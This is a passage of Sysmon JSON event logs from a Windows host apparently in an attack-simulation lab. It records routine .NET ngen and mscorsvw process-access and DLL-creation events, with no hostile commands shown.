08:05:13.695","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2239-5F25-0000-001072C30B00}","TargetProcessId":"2616","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7055,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:05:13.992\r\nProcessGuid: {41C8662E-2239-5F25-0000-001072C30B00}\r\nProcessId: 2616\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\a38-0\\Microsoft.Build.Framework.dll\r\nCreationUtcTime: 2020-08-01 08:05:13.992","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:05:13.992","ProcessGuid":"{41C8662E-2239-5F25-0000-001072C30B00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\a38-0\\Microsoft.Build.Framework.dll","CreationUtcTime":"2020-08-01 08:05:13.992","EventReceivedTime":"2020-08-01 08:05:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7056,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:14.023\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-223A-5F25-0000-0010FBC60B00}\r\nTargetProcessId: 2940\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:14.023","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-223A-5F25-0000-0010FBC60B00}","TargetProcessId":"2940","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7057,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:14.023\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-223A-5F25-0000-0010FBC60B00}\r\nTargetProcessId: 2940\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:14.023","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-223A-5F25-0000-0010FBC60B00}","TargetProcessId":"2940","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7058,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:14.038\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-223A-5F25-0000-0010FBC60B00}\r\nTargetProcessId: 2940\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:14.038","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-223A-5F25-0000-0010FBC60B00}","TargetProcessId":"2940","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7059,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:14.820\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-223A-5F25-0000-001006CB0B00}\r\nTargetProcessId: 2488\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:14.820","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-223A-5F25-0000-001006CB0B00}","TargetProcessId":"2488","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7060,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:14.820\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-223A-5F25-0000-001006CB0B00}\r\nTargetProcessId: 2488\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:14.820","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-223A-5F25-0000-001006CB0B00}","TargetProcessId":"2488","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7061,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:14.820\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-223A-5F25-0000-001006CB0B00}\r\nTargetProcessId: 2488\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:14.820","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-223A-5F25-0000-001006CB0B00}","TargetProcessId":"2488","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:17","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7062,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:05:17.788\r\nProcessGuid: {41C8662E-223A-5F25-0000-001006CB0B00}\r\nProcessId: 2488\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\9b8-0\\Microsoft.Build.Tasks.v4.0.dll\r\nCreationUtcTime: 2020-08-01 08:05:17.788","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:05:17.788","ProcessGuid":"{41C8662E-223A-5F25-0000-001006CB0B00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\9b8-0\\Microsoft.Build.Tasks.v4.0.dll","CreationUtcTime":"2020-08-01 08:05:17.788","EventReceivedTime":"2020-08-01 08:05:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:17","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7063,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:17.882\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-223D-5F25-0000-00106DD00B00}\r\nTargetProcessId: 3268\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 